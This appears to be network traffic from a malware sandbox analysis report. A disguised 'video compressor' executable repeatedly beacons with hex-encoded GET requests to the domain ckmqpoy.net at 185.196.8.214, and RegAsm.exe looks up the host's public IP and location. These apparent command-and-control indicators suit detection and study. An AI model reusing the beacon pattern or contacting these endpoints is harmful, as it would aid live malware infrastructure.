Sep 21, 2024 14:49:58.979582071 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:59.676649094 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.9	49814	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:59.880280018 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:00.567513943 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.9	49815	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:00.759402037 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:01.420367002 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.9	49816	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:01.690882921 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:02.370182037 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.9	49817	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:03.631860971 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:04.315742016 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.9	49819	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:05.290703058 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:05.926877022 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.9	49820	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:06.162523985 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:06.973529100 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.9	49821	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:07.227771997 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:07.916620970 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.9	49822	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:08.208347082 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:08.874736071 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.9	49823	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:09.302342892 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:09.959538937 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.9	49824	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:10.303121090 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:10.962641001 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.9	49825	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:11.253237009 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:11.927285910 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.9	49826	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:13.062978983 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:13.730045080 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.9	49827	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:14.029897928 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:15.583489895 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 21, 2024 14:50:15.583725929 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 21, 2024 14:50:15.584711075 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 21, 2024 14:50:15.585047960 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.9	49828	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:15.828810930 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:16.500785112 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.9	49832	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:19.155721903 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:20.418977022 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 21, 2024 14:50:20.419167995 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 21, 2024 14:50:20.422923088 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 21, 2024 14:50:20.536832094 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:20.782943010 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.9	49834	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:20.923192024 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:21.603557110 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.9	49836	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:21.737252951 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:22.443790913 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.9	49837	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:22.571687937 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:23.262243032 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.9	49839	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:23.404640913 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:24.104568005 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.9	49841	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:24.249202967 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:24.935394049 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.9	49842	185.196.8.214	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:50:25.056140900 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:50:25.745649099 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:50:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49707	173.231.16.77	443	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:03 UTC	202	OUT	GET /?format=json HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: api64.ipify.org
2024-09-21 12:48:03 UTC	156	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:03 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin
2024-09-21 12:48:03 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"ip":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49708	34.117.59.81	443	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:03 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: ipinfo.io
2024-09-21 12:48:03 UTC	458	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 1025 content-type: application/json; charset=utf-8 date: Sat, 21 Sep 2024 12:48:03 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-21 12:48:03 UTC	932	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
